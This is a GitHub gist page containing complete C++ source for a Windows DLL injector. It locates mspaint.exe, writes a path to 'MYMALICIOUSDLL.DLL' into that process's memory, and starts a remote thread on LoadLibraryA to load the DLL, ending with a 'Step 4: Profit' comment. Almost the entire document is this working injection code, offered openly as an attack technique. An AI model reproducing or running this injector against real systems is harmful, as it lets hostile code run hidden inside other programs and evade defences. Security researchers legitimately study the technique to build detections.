-
-
Save christophetd/b37c780d973cb2272562cde10af7596d to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <iostream> | |
#include <windows.h> | |
#include "Processthreadsapi.h" | |
#include "Libloaderapi.h" | |
#include <tlhelp32.h> | |
#include "winternl.h" | |
using namespace std; | |
int err(const char* msg) { | |
cerr << msg << endl; | |
return 1; | |
} | |
int find_process(const wchar_t* process_name) { | |
PROCESSENTRY32 entry; | |
entry.dwSize = sizeof(PROCESSENTRY32); | |
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL); | |
int returnValue = 0; | |
if (!Process32First(snapshot, &entry)) { | |
goto cleanup; | |
} | |
while (Process32Next(snapshot, &entry)) { | |
if (wcscmp(entry.szExeFile, process_name) == 0) { | |
returnValue = entry.th32ProcessID; | |
goto cleanup; | |
} | |
} | |
cleanup: | |
CloseHandle(snapshot); | |
return returnValue; | |
} | |
#define INJECTION_TARGET L"mspaint.exe" | |
#define DLL_TO_INJECT "C:\\Users\\Christophe\\source\\repos\\MyMaliciousDll\\x64\\Release\\MYMALICIOUSDLL.DLL" | |
int main() | |
{ | |
cout << "Getting handle on target process" << endl; | |
int desiredAccess = PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ; | |
HANDLE hTargetProcess = OpenProcess(desiredAccess, true, find_process(INJECTION_TARGET)); | |
if (hTargetProcess == NULL) | |
return err("Unable to get a handle on target process"); | |
// Step 2: Write DLL name in target process memory | |
// NOTE: the DLL must be 64-bit | |
// Allocate new memory region | |
LPVOID targetDataPage = VirtualAllocEx(hTargetProcess, NULL, strlen(DLL_TO_INJECT), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); | |
if (targetDataPage == NULL) | |
err("Unable to allocate memory in target process"); | |
// Step 2.2: Write DLL path to allocated memory | |
if (0 == WriteProcessMemory(hTargetProcess, targetDataPage, DLL_TO_INJECT, strlen(DLL_TO_INJECT), NULL)) | |
return err("Unable to write DLL path to target process memory"); | |
// Step 3: Get address of the "LoadLibraryA" function | |
cout << "Retrieving LoadLibraryA address" << endl; | |
HMODULE hModule = GetModuleHandleA("kernel32.dll"); | |
FARPROC load_library_addr = GetProcAddress(hModule, "LoadLibraryA"); | |
cout << "LoadLibraryA @ " << load_library_addr << endl; | |
// Step 4: CreateRemoteThread with this address and "dllname" as a parameter | |
DWORD threadId = 0; | |
HANDLE hThread = CreateRemoteThread( | |
hTargetProcess, | |
NULL, | |
0, | |
(LPTHREAD_START_ROUTINE) load_library_addr, | |
targetDataPage, | |
0, | |
&threadId | |
); | |
if (hThread == NULL) { | |
cerr << "Unable to create remote thread: error " << GetLastError() << endl; | |
return 1; | |
} | |
// Step 4: Profit | |
return 0; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment